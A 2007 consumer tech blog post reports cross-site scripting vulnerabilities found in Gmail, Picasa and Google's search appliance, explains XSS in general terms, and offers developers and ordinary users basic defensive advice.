Posted 09/24/07 at 11:32:52 PM | by Mark Soper
It's a commonplace that online security threats are aimed at the biggest target available. In terms of operating systems, it's still Microsoft. But if you consider how people use the Internet, think G - G for Google, that is.
According to theRegister.co.uk website (motto "biting the hand that feeds IT"), Google's Gmail web-based email, Picasa picture organizer, and embedded search appliance (used in websites that incorporate Google Search) have recently been proven to be vulnerable to exploits using cross site scripting (XSS).
XSS takes advantage of the fact that JavaScript, HTML, VBScript, ActiveX, and Flash scripts are commonly used in websites. Put simply, an XSS attack (exploit) embeds a malicious script into a dynamic web page. The script captures or manipulates information as the attacker desires. This type of threat isn't new: the FAQ link provided above goes back to 2003. What's scary about XSS exploits is that they threaten the very richness of the Internet. I remember when websites were almost all text with just the occasional photo or drawing. Today's web user wants more - and unfortunately, that makes XSS attacks more common.
In the case of the most recent Google XSS problems, XSS vulnerabilities could be used to steal cookies, steal photos from Picasa, contacts from a Gmail account, and redirected Gmail messages to a specified account. Although Google's taken action to block these attacks, this is just the latest round in XSS-based vulnerabilities suffered by Google - and others. For example, the Samy (aka J.S. Spacehero) virus used XSS to infect over a million MySpace users' pages in 2005, and a May 2007 ranking of websites with XSS vulnerabilities (available from this page) lists many major websites, including Flickr, Photobucket, Yahoo! and many others.
The ultimate solution to XSS vulnerabilities would be to disable all scripts - unfortunately, in today's Internet, such a move would also disable most commercial websites. Boring! So, what else can you do?
If you develop websites for fun or profit, consider scanning them for XSS vulnerabilities, using a tool such as the Web Vulnerability Scanner from Acunetix Ltd (a free version is available) or others. This Google search (ironic, isn't it?) will find more examples.
But, if you're an ordinary web user, not a developer,what are your options (other than disabling scripting, that is)?
1. If you use browser add-ons or updates to other types of web-enabled products, make sure you install updates as soon as they're available. As with updates for Windows, browser add-on updates are often provided to improve security.
2. Keep in mind that any web-based service can be vulnerable to XSS.
3. XSS vulnerabilities are often cross-browser threats; using Firefox or Opera might not protect you.
4. Most XSS exploits also depend upon old favorites like spoofing or clicking links. As always, think before you click.
Comments
Print
Email
© 2008 Future US, Inc. All Rights Reserved.
Links:
[1] http://www.theregister.co.uk
[2] http://www.theregister.co.uk/2007/09/24/google_vulns_put_users_at_risk/
[3] http://www.cgisecurity.com/articles/xss-faq.shtml
[4] http://www.sophos.com/virusinfo/analyses/jsspaceheroa.html
[5] http://hublog.hubmed.org/archives/001487.html
[6] http://www.acunetix.com/cross-site-scripting/scanner.htm
[7] http://www.google.com/search?q=XSS scanner&hl=en
[8] http://www.maximumpc.com/article/safer_browsing
[9] http://www.maximumpc.com/article/think_before_you_click_on_that_great_job_offer
[10] http://www.maximumpc.com/article/How-To--Protect-Yourself-from-Phishing-and-Pharming